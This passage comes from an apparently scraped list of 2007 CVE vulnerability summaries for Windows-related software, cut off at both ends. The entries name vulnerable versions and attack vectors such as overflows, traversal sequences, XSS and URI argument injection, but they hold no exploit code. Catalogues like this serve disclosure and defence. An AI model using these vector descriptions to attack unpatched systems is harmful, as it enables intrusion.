allows remote attackers to bypass the Same Origin Policy, with access from local zones to external domains, via a certain body.innerHTML property value, aka "classic JavaScript frame hijacking." [CVE-2007-4424] Apple Safari for Windows 3.0.3 and earlier does not prompt the user before downloading a file, which allows remote attackers to download arbitrary files to the desktop of a client system via certain HTML, as demonstrated by a filename in the DATA attribute of an OBJECT element. NOTE: it could be argued that this is not a vulnerability because a dangerous file is not actually launched, but as of 2007, it is generally accepted that web browsers should prompt users before saving dangerous content. [CVE-2007-4415] Cisco VPN Client on Windows before 5.0.01.0600, and the 5.0.01.0600 InstallShield (IS) release, uses weak permissions for cvpnd.exe (Modify granted to Interactive Users), which allows local users to gain privileges via a modified cvpnd.exe. [CVE-2007-4372] Unspecified vulnerability in NetWin SurgeMail 38k on Windows Server 2003 has unknown impact and remote attack vectors. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. [CVE-2007-4356] Microsoft Internet Explorer 6 and 7 embeds FTP credentials in HTML files that are retrieved during an FTP session, which allows context-dependent attackers to obtain sensitive information by reading the HTML source, as demonstrated by a (1) .htm, (2) .html, or (3) .mht file. [CVE-2007-4348] Cross-site scripting (XSS) vulnerability in the CAD service in IBM Tivoli Storage Manager (TSM) Client 5.3.5.3 and 5.4.1.2 for Windows allows remote attackers to inject arbitrary web script or HTML via HTTP requests to port 1581, which generate log entries in a dsmerror.log file that is accessible through a certain web interface. [CVE-2007-4347] Multiple integer overflows in the Job Engine (bengine.exe) service in Symantec Backup Exec for Windows Servers (BEWS) 11d build 11.0.7170 and 11.0.6.6235 allow remote attackers to cause a denial of service (CPU and memory consumption) via a crafted packet to port 5633/tcp, which triggers an infinite loop. [CVE-2007-4346] The Job Engine (bengine.exe) service in Symantec Backup Exec for Windows Servers (BEWS) 11d build 11.0.7170 and 11.0.6.6235 allows remote attackers to cause a denial of service (NULL dereference and service crash) via a crafted packet to port 5633/tcp. [CVE-2007-4336] Buffer overflow in the Live Picture Corporation DXSurface.LivePicture.FlashPix.1 (DirectTransform FlashPix) ActiveX control in DXTLIPI.DLL 6.0.2.827, as packaged in Microsoft DirectX Media 6.0 SDK, allows remote attackers to execute arbitrary code via a long SourceUrl property value. [CVE-2007-4315] The AMD ATI atidsmxx.sys 3.0.502.0 driver on Windows Vista allows local users to bypass the driver signing policy, write to arbitrary kernel memory locations, and thereby gain privileges via unspecified vectors, as demonstrated by "Purple Pill". [CVE-2007-4254] Stack-based buffer overflow in a certain ActiveX control in VDT70.DLL in Microsoft Visual Database Tools Database Designer 7.0 for Microsoft Visual Studio 6 allows remote attackers to execute arbitrary code via a long argument to the NotSafe method. NOTE: this may overlap CVE-2007-2885 or CVE-2005-2127. [CVE-2007-4223] Dbgv.sys in Microsoft Sysinternals DebugView before 4.72 provides an unspecified mechanism for copying data into kernel memory, which allows local users to gain privileges via unspecified vectors. [CVE-2007-4221] Multiple buffer overflows in Motorola Timbuktu Pro before 8.6.5 for Windows allow remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via (1) a long user name and (2) certain malformed requests [CVE-2007-4220] Directory traversal vulnerability in Motorola Timbuktu Pro before 8.6.5 for Windows allows remote attackers to create or delete arbitrary files via a .. (dot dot) in a Send request, probably related to the (1) Send and (2) Exchange services. [CVE-2007-4219] Integer overflow in the RPCFN_SYNC_TASK function in StRpcSrv.dll, as used by the ServerProtect service (SpntSvc.exe), in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allows remote attackers to execute arbitrary code via a certain integer field in a request packet to TCP port 5168, which triggers a heap-based buffer overflow. [CVE-2007-4218] Multiple buffer overflows in the ServerProtect service (SpntSvc.exe) in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allow remote attackers to execute arbitrary code via certain RPC requests to certain TCP ports that are processed by the (1) RPCFN_ENG_NewManualScan, (2) RPCFN_ENG_TimedNewManualScan, and (3) RPCFN_SetComputerName functions in (a) StRpcSrv.dll [CVE-2007-4050] Unspecified vulnerability in WebUI in ADempiere Bazaar before 3.3 beta Victoria edition allows remote attackers to access system-level windows via unspecified vectors. [CVE-2007-4040] Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670. [CVE-2007-4036] DISPUTED Guidance Software EnCase allows user-assisted remote attackers to cause a denial of service via (1) a corrupted Microsoft Exchange database, which triggers an application crash when many options are selected [CVE-2007-4025] Unspecified vulnerability in Sun Java System (SJS) Application Server 8.1 through 9.0 before 20070724 on Windows allows remote attackers to obtain JSP source code via unspecified vectors. [CVE-2007-4006] Buffer overflow in Mike Dubman Windows RSH daemon (rshd) 1.7 has unknown impact and remote attack vectors, aka ZD-00000034. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. [CVE-2007-4005] Stack-based buffer overflow in Mike Dubman Windows RSH daemon (rshd) 1.7 allows remote attackers to execute arbitrary code via a long string to the shell port (514/tcp). NOTE: this might overlap CVE-2007-4006. [CVE-2007-3956] TeamSpeak WebServer 2.0 for Windows does not validate parameter value lengths and does not expire TCP sessions, which allows remote attackers to cause a denial of service (CPU and memory consumption) via long username and password parameters in a request to login.tscmd on TCP port 14534. [CVE-2007-3954] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with SeaMonkey installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a mailto URI, which are inserted into the command line that is created when invoking SeaMonkey.exe, a related issue to CVE-2007-3670. [CVE-2007-3930] Interpretation conflict between Microsoft Internet Explorer and DocuWiki before 2007-06-26b allows remote attackers to inject arbitrary JavaScript and conduct cross-site scripting (XSS) attacks when spellchecking UTF-8 encoded messages via the spell_utf8test function in lib/exe/spellcheck.php, which triggers HTML document identification and script execution by Internet Explorer even though the Content-Type header is text/plain. [CVE-2007-3924] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Netscape installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a -chrome argument to the navigatorurl URI, which are inserted into the command line that is created when invoking netscape.exe, a related issue to CVE-2007-3670. NOTE: there has been debate about whether the issue is in Internet Explorer or Netscape. As of 20070713, it is CVE's opinion that IE appears to not properly delimit the URL argument when invoking Netscape [CVE-2007-3903] Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code via uninitialized or deleted objects used in repeated calls to the (1) cloneNode or (2) nodeValue JavaScript function, a different issue than CVE-2007-3902 and CVE-2007-5344, a variant of "Uninitialized Memory Corruption Vulnerability." [CVE-2007-3902] Use-after-free vulnerability in the CRecalcProperty function in mshtml.dll in Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code by calling the setExpression method and then modifying the outerHTML property of an HTML element, one variant of "Uninitialized Memory Corruption Vulnerability." [CVE-2007-3901] Stack-based buffer overflow in the DirectShow Synchronized Accessible Media Interchange (SAMI) parser in quartz.dll for Microsoft DirectX 7.0 through 10.0 allows remote attackers to execute arbitrary code via a crafted SAMI file. [CVE-2007-3899] Unspecified vulnerability in Microsoft Word 2000 SP3, Word 2002 SP3, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a malformed string in a Word file, aka "Word Memory Corruption Vulnerability." [CVE-2007-3895] Buffer overflow in Microsoft DirectShow in Microsoft DirectX 7.0 through 10.0 allows remote attackers to execute arbitrary code via a crafted (1) WAV or (2) AVI file. [CVE-2007-3893] Unspecified vulnerability in Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via unspecified vectors involving memory corruption from an unhandled error. [CVE-2007-3892] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to spoof the URL address bar and other "trust UI" components via unspecified vectors, a different issue than CVE-2007-1091 and CVE-2007-3826. [CVE-2007-3891] Unspecified vulnerability in Windows Vista Weather Gadgets in Windows Vista allows remote attackers to execute arbitrary code via crafted HTML attributes. [CVE-2007-3890] Microsoft Excel in Office 2000 SP3, Office XP SP3, Office 2003 SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via a Workspace with a certain index value that triggers memory corruption. [CVE-2007-3872] Multiple stack-based buffer overflows in the Shared Trace Service (OVTrace) service for HP OpenView Operations A.07.50 for Windows, and possibly earlier versions, allow remote attackers to execute arbitrary code via certain crafted requests. [CVE-2007-3846] Directory traversal vulnerability in Subversion before 1.4.5, as used by TortoiseSVN before 1.4.5 and possibly other products, when run on Windows-based systems, allows remote authenticated users to overwrite and create arbitrary files via a ..\ (dot dot backslash) sequence in the filename, as stored in the file repository. [CVE-2007-3815] Buffer overflow in pirs32.exe in Poslovni informator Republike Slovenije (PIRS) 2007 allows local users to cause a denial of service (application crash) and possibly execute arbitrary code via a long search string in certain fields in the GUI. NOTE: this may cross privilege boundaries if PIRS is used by data-entry workers who do not have full access to the underlying Windows environment. [CVE-2007-3793] SQL injection vulnerability in Job Management Partner 1/NETM/DM (JP1/NETM/DM) Manager on Windows before 20070413 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2007-3760] Cross-site scripting (XSS) vulnerability in Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to inject arbitrary web script or HTML via frame tags. [CVE-2007-3758] Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and in Mac OS X 10.4 through 10.4.10, allows remote attackers to set Javascript window properties for web pages that are in a different domain, which can be leveraged to conduct cross-site scripting (XSS) attacks. [CVE-2007-3756] Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to obtain sensitive information via a crafted web page that identifies the URL of the parent window, even when the parent window is in a different domain. [CVE-2007-3743] Stack-based buffer overflow in bookmark handling in Apple Safari 3 Beta before Update 3.0.3 on Windows allows user-assisted remote attackers to cause a denial of service (application crash) or execute arbitrary code via a bookmark with a long title. [CVE-2007-3718] Multiple unspecified vulnerabilities in the SVG parsing engine in Apple Safari 3 Beta for Windows have unspecified remote attack vectors and impact. NOTE: this issue contains no actionable information, but it was released by a reliable researcher. [CVE-2007-3678] Stack-based buffer overflow in the MSWord text-import extension (Word 6-2000 Filter.xnt) in QuarkXPress 7.2 for Windows, when using the Rectangle Text Box tool for importing text, allows user-assisted remote attackers to execute arbitrary code via a long font name. [CVE-2007-3670] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a (1) FirefoxURL or (2) FirefoxHTML URI, which are inserted into the command line that is created when invoking firefox.exe. NOTE: it has been debated as to whether the issue is in Internet Explorer or Firefox. As of 20070711, it is CVE's opinion that IE appears to be failing to properly delimit the URL argument when invoking Firefox, and this issue could arise with other protocol handlers in IE as well. However, Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending Firefox malicious data." [CVE-2007-3658] Unspecified vulnerability in Microsoft Register Server (REGSVR) allows attackers to cause a denial of service via a crafted DLL library. [CVE-2007-3625] The Program Neighborhood Agent in Citrix Presentation Server Clients for 32-bit Windows before 10.100 allows remote attackers to cause a denial of service (agent exit) via a certain request that uses content redirection and a long pathname. [CVE-2007-3615] Internet Communication Manager (aka ICMAN.exe or ICM) in SAP NetWeaver Application Server 6.x and 7.x, possibly only on Windows, allows remote attackers to cause a denial of service (process crash) via a URI of a certain length that contains a sap-isc-key parameter, related to configuration of a web cache. [CVE-2007-3576] DISPUTED Microsoft Internet Explorer 6 executes web script from URIs of arbitrary scheme names ending with the "script" character sequence, using the (1) vbscript: handler for scheme names with 7 through 9 characters, and the (2) javascript: handler for scheme names with 10 or more characters, which might allow remote attackers to bypass certain XSS protection schemes. NOTE: other researchers dispute the significance of this issue, stating "this only works when typed in the address bar." [CVE-2007-3550] DISPUTED Microsoft Internet Explorer 6.0 and 7.0 allows remote attackers to fill Zones with arbitrary domains using certain metacharacters such as wildcards via JavaScript, which results in a denial of service (website suppression and resource consumption), aka "Internet Explorer Zone Domain Specification Dos and Page Suppressing". NOTE: this issue has been disputed by a third party, who states that the zone settings cannot be manipulated. [CVE-2007-3546] Cross-site scripting (XSS) vulnerability in the Windows GUI in Nessus Vulnerability Scanner before 3.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3514] Cross-domain vulnerability in Apple Safari for Windows 3.0.2 allows remote attackers to bypass the Same Origin Policy and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute to a file:// location, a different vector than CVE-2007-3482. [CVE-2007-3509] Heap-based buffer overflow in the RPC subsystem in Symantec Backup Exec for Windows Servers 10.0, 10d, and 11d allows remote attackers to cause a denial of service (process exit) and possibly execute arbitrary code via crafted ncacn_ip_tcp requests. [CVE-2007-3504] Directory traversal vulnerability in the PersistenceService in Sun Java Web Start in JDK and JRE 5.0 Update 11 and earlier, and Java Web Start in SDK and JRE 1.4.2_13 and earlier, for Windows allows remote attackers to perform unauthorized actions via an application that grants file overwrite privileges to itself. NOTE: this can be leveraged to execute arbitrary code by overwriting a .java.policy file. [CVE-2007-3497] Microsoft Internet Explorer 7 allows remote attackers to determine the existence of page history via the history.length JavaScript variable. [CVE-2007-3490] Unspecified vulnerability in Microsoft Excel 2003 SP2 allows remote attackers to have an unknown impact via unspecified vectors, possibly related to the sheet name, as demonstrated by 2670.xls. [CVE-2007-3482] Cross-domain vulnerability in Apple Safari for Windows 3.0.1 allows remote attackers to bypass the "same origin policy" and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute. [CVE-2007-3481] DISPUTED ** Cross-domain vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to bypass the Same Origin Policy and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute. NOTE: this issue has been disputed by other researchers, citing a variable scoping issue and information about the semantics of document.domain. [CVE-2007-3445] Buffer overflow in SJ Labs SJphone 1.60.303c, running under Windows Mobile 2003 on the Samsung SCH-i730 phone, allows remote attackers to cause a denial of service (device hang and call termination) via a malformed SIP INVITE message, a different vulnerability than CVE-2007-3351. [CVE-2007-3437] AOL Instant Messenger (AIM) 6.1.32.1 on Windows XP allows remote attackers to cause a denial of service (application crash) via a malformed header value in a SIP INVITE message, a different vulnerability than CVE-2007-3350. [CVE-2007-3376] Buffer overflow in Apple Safari 3.0.2 on Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long value in the title HTML tag, which triggers the overflow when the user adds the page as a bookmark. [CVE-2007-3362] ageet AGEphone before 1.6.2, running on Windows Mobile 5 on the HTC HyTN Pocket PC device, allows remote attackers to (1) cause a denial of service (call disruption and device hang) via a SIP message with a malformed header and (2) cause a denial of service (call disruption, false ring indication, and device outage) via a SIP message with a malformed SDP delimiter. [CVE-2007-3351] The SJPhone SIP soft phone 1.60.303c, when installed on the Dell Axim X3 running Windows Mobile 2003, allows remote attackers to cause a denial of service (device hang and traffic amplification) via a direct crafted INVITE transaction, which causes the phone to transmit many RTP packets. [CVE-2007-3350] AOL Instant Messenger (AIM) 6.1.32.1 on Windows XP allows remote attackers to cause a denial of service (application hang) via a flood of spoofed SIP INVITE requests. [CVE-2007-3341] Unspecified vulnerability in the FTP implementation in Microsoft Internet Explorer allows remote attackers to "see a valid memory address" via unspecified vectors, a different issue than CVE-2007-0217. [CVE-2007-3334] Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. [CVE-2007-3285] Mozilla Firefox before 2.0.0.5, when run on Windows, allows remote attackers to bypass file type checks and possibly execute programs via a (1) file:/// or (2) resource: URI with a dangerous extension, followed by a NULL byte (%00) and a safer extension, which causes Firefox to treat the requested file differently than Windows would. [CVE-2007-3284] corefoundation.dll in Apple Safari 3.0.1 (552.12.2) for Windows allows remote attackers to cause a denial of service (crash) via certain forms that trigger errors related to History, possibly involving multiple form fields with the same name. [CVE-2007-3282] Buffer overflow in the Microsoft Office MSODataSourceControl ActiveX object allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long argument to the DeleteRecordSourceIfUnused method. [CVE-2007-3274] Apple Safari 3.0 and 3.0.1 on Windows XP SP2 allows attackers to cause a denial of service (application crash) via JavaScript that sets the document.location variable, as demonstrated by an empty value of document.location. [CVE-2007-3201] Visual truncation vulnerability in Windows Privacy Tray (WinPT) 1.2.0 allows user-assisted remote attackers to install a key listed under the wrong user ID, and possibly cause the user to encrypt a victim's correspondence with this attacker-supplied key, via a key ID composed of the attacker's user ID, space characters, an invalid WinPT message, additional space characters, and the victim's user ID. [CVE-2007-3187] Multiple unspecified vulnerabilities in Apple Safari for Windows allow remote attackers to cause a denial of service or execute arbitrary code, possibly involving memory corruption, and a different issue from CVE-2007-3185 and CVE-2007-3186. NOTE: as of 20070612, the original disclosure has no actionable information. However, since it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2007-3186] Apple Safari Beta 3.0.1 for Windows allows remote attackers to execute arbitrary commands via shell metacharacters in a URI in the SRC of an IFRAME, as demonstrated using a gopher URI. [CVE-2007-3185] Apple Safari Beta 3.0.1 for Windows public beta allows remote attackers to cause a denial of service (crash) via unspecified DHTML manipulations that trigger memory corruption, as demonstrated using Hamachi. [CVE-2007-3180] Buffer overflow in Help and Support Center before 4.4 C on HP Windows systems allows remote attackers to read or write arbitrary files via unknown vectors. [CVE-2007-3164] Microsoft Internet Explorer 7, when prompting for HTTP Basic Authentication for an IDN web site, uses ACE labels for the domain name in the status bar, but uses internationalized labels for this name in the authentication dialog, which might allow remote attackers to perform phishing attacks if the user misinterprets confusable characters in the internationalized labels, as demonstrated by displaying xn--theshmogroup-bgk.com only in the status bar. [CVE-2007-3153] The ares_init:randomize_key function in c-ares, on platforms other than Windows, uses a weak facility for producing a random number sequence (Unix rand), which makes it easier for remote attackers to spoof DNS responses by guessing certain values. [CVE-2007-3111] Buffer overflow in the Provideo Camimage ActiveX control in ISSCamControl.dll 1.0.1.5, when Internet Explorer 6 is used on Windows 2000 SP4, allows remote attackers to execute arbitrary code via a long URL property value. [CVE-2007-3109] The CERN Image Map Dispatcher (htimage.exe) in Microsoft FrontPage allows remote attackers to determine the existence, and possibly partial contents, of arbitrary files under the web root via a relative pathname in the PATH_INFO. [CVE-2007-3092] Microsoft Internet Explorer 6 allows remote attackers to spoof the URL bar, and page properties including SSL certificates, by interrupting page loading through certain use of location DOM objects and setTimeout calls. NOTE: this issue can be leveraged for phishing and other attacks. [CVE-2007-3091] Race condition in Microsoft Internet Explorer 6 SP1 [CVE-2007-3075] Directory traversal vulnerability in Microsoft Internet Explorer allows remote attackers to read arbitrary files via directory traversal sequences in a URI with a certain scheme, possibly related to "..%5C" (encoded backslash) sequences. [CVE-2007-3072] Directory traversal vulnerability in Mozilla Firefox before 2.0.0.4 on Windows allows remote attackers to read arbitrary files via ..%5C (dot dot encoded backslash) sequences in a resource:// URI. [CVE-2007-3062] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 2.1.2 running on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3043] Cross-site scripting (XSS) vulnerability in Collaboration - File Sharing 01-20 up to 01-20-/B and 01-30 up to 01-30-/B in Hitachi Groupmax Collaboration Portal up to 07-30-/D, Groupmax Collaboration Web Client - Forum/File Sharing up to 07-30-/C, uCosminexus Collaboration Portal up to 06-30-/D, and uCosminexus Collaboration Portal - Forum/File Sharing up to 06-30-/C on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3041] Unspecified vulnerability in the pdwizard.ocx ActiveX object for Internet Explorer 5.01, 6 SP1, and 7 allows remote attackers to execute arbitrary code via unknown vectors related to Microsoft Visual Basic 6 objects and memory corruption, aka "ActiveX Object Memory Corruption Vulnerability." [CVE-2007-3033] Cross-site scripting (XSS) vulnerability in Windows Vista Feed Headlines Gadget (aka Sidebar RSS Feeds Gadget) in Windows Vista allows user-assisted remote attackers to execute arbitrary code via an RSS feed with crafted HTML attributes, which are not properly removed and are rendered in the local zone. [CVE-2007-3032] Unspecified vulnerability in Windows Vista Contacts Gadget in Windows Vista allows user-assisted remote attackers to execute arbitrary code via crafted contact information that is not properly handled when it is imported. [CVE-2007-3030] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, and 2003 Viewer allows user-assisted remote attackers to execute arbitrary code via a malformed Excel file involving the "denoting [of] the start of a Workspace designation", which results in memory corruption, aka the "Workbook Memory Corruption Vulnerability". [CVE-2007-3029] Unspecified vulnerability in Microsoft Excel 2002 SP3 and 2003 SP2 allows user-assisted remote attackers to execute arbitrary code via a malformed Excel file containing multiple active worksheets, which results in memory corruption. [CVE-2007-3027] Race condition in Microsoft Internet Explorer 5.01, 6, and 7 allows remote attackers to execute arbitrary code by causing Internet Explorer to install multiple language packs in a way that triggers memory corruption, aka "Language Pack Installation Vulnerability." [CVE-2007-2954] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2 through SP4 for Windows allow remote attackers to execute arbitrary code via certain long arguments to the (1) RpcAddPrinterDriver, (2) RpcGetPrinterDriverDirectory, and other unspecified RPC requests, aka Novell bug 300870, a different vulnerability than CVE-2006-5854. [CVE-2007-2931] Heap-based buffer overflow in Microsoft MSN Messenger 6.2, 7.0, and 7.5, and Live Messenger 8.0 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving video conversation handling in Web Cam and video chat sessions. [CVE-2007-2927] Unspecified vulnerability in Atheros 802.11 a/b/g wireless adapter drivers before 5.3.0.35, and 6.x before 6.0.3.67, on Windows allows remote attackers to cause a denial of service via a crafted 802.11 management frame. [CVE-2007-2903] Buffer overflow in the HelpPopup method in the Microsoft Office 2000 Controllo UA di Microsoft Office ActiveX control (OUACTRL.OCX) 1.0.1.9 allows remote attackers to cause a denial of service (probably winhlp32.exe crash) via a long first argument. NOTE: it is not clear whether this issue crosses privilege boundaries. [CVE-2007-2897] Microsoft Internet Information Services (IIS) 6.0 allows remote attackers to cause a denial of service (server instability or device hang), and possibly obtain sensitive information (device communication traffic) [CVE-2007-2896] Race condition in the Symantec Enterprise Security Manager (ESM) 6.5.3 managers and agents on Windows before 20070524 allows remote attackers to cause a denial of service (CPU consumption and application hang) via certain network scans to ESM ports. [CVE-2007-2885] The NotSafe function in the MSVDTDatabaseDesigner7 ActiveX control in VDT70.DLL in Microsoft Visual Database Tools (MSVDT) Database Designer 7.0 allows remote attackers to cause a denial of service (Internet Explorer 6 crash) via a long argument. [CVE-2007-2884] Multiple stack-based buffer overflows in Microsoft Visual Basic 6 allow user-assisted remote attackers to cause a denial of service (CPU consumption) or execute arbitrary code via a Visual Basic Project (vbp) file with a long (1) Description or (2) Company Name (VersionCompanyName) field. [CVE-2007-2883] Credant Mobile Guardian Shield for Windows 5.2.1.105 and earlier stores account names and passwords in plaintext in memory, which allows local users to obtain sensitive information by (1) reading the paging file or (2) dumping and searching the memory image. NOTE: This issue crosses privilege boundaries because the product is intended to protect the data on a stolen computer. [CVE-2007-2809] Buffer overflow in the transfer manager in Opera before 9.21 for Windows allows user-assisted remote attackers to execute arbitrary code via a crafted torrent file. NOTE: due to the lack of details, it is not clear if this is the same issue as CVE-2007-2274. [CVE-2007-2718] Cross-site scripting (XSS) vulnerability in the WebMail system in Stalker CommuniGate Pro 5.1.8 and earlier, when using Microsoft Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via crafted STYLE tags. [CVE-2007-2528] Buffer overflow in AgRpcCln.dll for Trend Micro ServerProtect 5.58 for Windows before Security Patch 3 Build 1176 allows remote attackers to execute arbitrary code via unknown vectors related to RPC requests. NOTE: this is probably a different vulnerability than CVE-2007-2508. [CVE-2007-2441] Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to obtain the system path via certain URLs associated with (1) deploying web applications or (2) displaying .xtp files. [CVE-2007-2440] Directory traversal vulnerability in Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to read certain files via a .. (dot dot) in a URI containing a "\web-inf" sequence. [CVE-2007-2439] Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to cause a denial of service (device hang) and read data from a COM or LPT device via a DOS device name with an arbitrary extension. [CVE-2007-2407] The Samba server on Apple Mac OS X 10.3.9 and 10.4.10, when Windows file sharing is enabled, does not enforce disk quotas after dropping privileges, which allows remote authenticated users to use disk space in excess of quota. [CVE-2007-2400] Race condition in Apple Safari 3 Beta before 3.0.2 on Mac OS X, Windows XP, Windows Vista, and iPhone before 1.0.1, allows remote attackers to bypass the JavaScript security model and modify pages outside of the security domain and conduct cross-site scripting (XSS) attacks via vectors related to page updating and HTTP redirects. [CVE-2007-2398] Apple Safari 3.0.1 beta (522.12.12) on Windows allows remote attackers to modify the window title and address bar while filling the main window with arbitrary content by setting the location bar and using setTimeout() to create an event that modifies the window content, which could facilitate phishing attacks. [CVE-2007-2391] Cross-site scripting (XSS) vulnerability in Apple Safari Beta 3.0.1 for Windows allows remote attackers to inject arbitrary web script or HTML via a web page that includes a windows.setTimeout function that is activated after the user has moved from the current page. [CVE-2007-2389] Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not clear potentially sensitive memory before use, which allows remote attackers to read memory from a web browser via unknown vectors related to Java applets. [CVE-2007-2388] Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not properly restrict QTObject subclassing, which allows remote attackers to execute arbitrary code via a web page containing a user-defined class that accesses unsafe functions that can be leveraged to write to arbitrary memory locations. [CVE-2007-2380] The Microsoft Atlas framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2344] The BOOTPD component in Enterasys NetSight Console 2.1 and NetSight Inventory Manager 2.1, and possibly earlier, on Windows allows remote attackers to cause a denial of service (daemon crash) via a UDP packet that contains an invalid "packet type" field. [CVE-2007-2291] CRLF injection vulnerability in the Digest Authentication support for Microsoft Internet Explorer 7.0.5730.11 allows remote attackers to conduct HTTP response splitting attacks via a LF (%0a) in the username attribute. [CVE-2007-2279] The Scheduler Service (VxSchedService.exe) in Symantec Storage Foundation for Windows 5.0 allows remote attackers to bypass authentication and execute arbitrary code via certain requests to the service socket that create (1) PreScript or (2) PostScript registry values under Veritas\VxSvc\CurrentVersion\Schedules specifying future command execution. [CVE-2007-2269] Directory traversal vulnerability in top.php3 in SWsoft Plesk for Windows 8.1 and 8.1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the locale_id parameter. [CVE-2007-2268] Multiple directory traversal vulnerabilities in SWsoft Plesk for Windows 7.6.1, 8.1.0, and 8.1.1 allow remote attackers to read arbitrary files via a .. (dot dot) in the locale_id parameter to (1) login.php3 or (2) login_up.php3. [CVE-2007-2238] Multiple stack-based buffer overflows in the Whale Client Components ActiveX control (WhlMgr.dll), as used in Microsoft Intelligent Application Gateway (IAG) before 3.7 SP2, allow remote attackers to execute arbitrary code via long arguments to the (1) CheckForUpdates or (2) UpdateComponents methods. [CVE-2007-2223] Microsoft XML Core Services (MSXML) 3.0 through 6.0 allows remote attackers to execute arbitrary code via the substringData method on a (1) TextNode or (2) XMLDOM object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2222] Multiple buffer overflows in the (1) ActiveListen (Xlisten.dll) and (2) ActiveVoice (Xvoice.dll) speech controls, as used by Microsoft Internet Explorer 5.01, 6, and 7, allow remote attackers to execute arbitrary code via a crafted ActiveX object that triggers memory corruption, as demonstrated via the ModeName parameter to the FindEngine function in ACTIVEVOICEPROJECTLib.DirectSS. [CVE-2007-2161] Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (browser hang) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)/. [CVE-2007-2137] Heap-based buffer overflow in kde.dll in IBM Tivoli Monitoring Express 6.1.0 before Fix Pack 2, as used in Tivoli Universal Agent, Windows OS Monitoring agent, and Enterprise Portal Server, allows remote attackers to execute arbitrary code by sending a long string to a certain TCP port. [CVE-2007-2110] Unspecified vulnerability in the Core RDBMS component for Oracle Database 9.0.1.5 and 10.1.0.4 on Windows systems has unknown impact and attack vectors, aka DB03. NOTE: as of 20070424, Oracle has not disputed reliable claims that DB03 occurs because RDBMS uses a NULL Discretionary Access Control List (DACL) for the Oracle process and certain shared memory sections, which allows local users to inject threads and execute arbitrary code via the OpenProcess, OpenThread, and SetThreadContext functions (DB03). [CVE-2007-2108] Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.0.1.5, 9.2.0.8, 10.1.0.5, and 10.2.0.2 on Windows allows remote attackers to have an unknown impact, aka DB01. NOTE: as of 20070424, Oracle has not disputed reliable claims that this issue occurs because the NTLM SSPI AcceptSecurityContext function grants privileges based on the username provided even though all users are authenticated as Guest, which allows remote attackers to gain privileges. [CVE-2007-2080] Multiple SQL injection vulnerabilities in XAMPP 1.6.0a for Windows allow remote attackers to execute arbitrary SQL commands via unspecified vectors in certain test scripts. [CVE-2007-2079] The ADONewConnection Connect function in adodb.php in XAMPP 1.6.0a and earlier for Windows uses untrusted input for the database server hostname, which allows remote attackers to trigger a 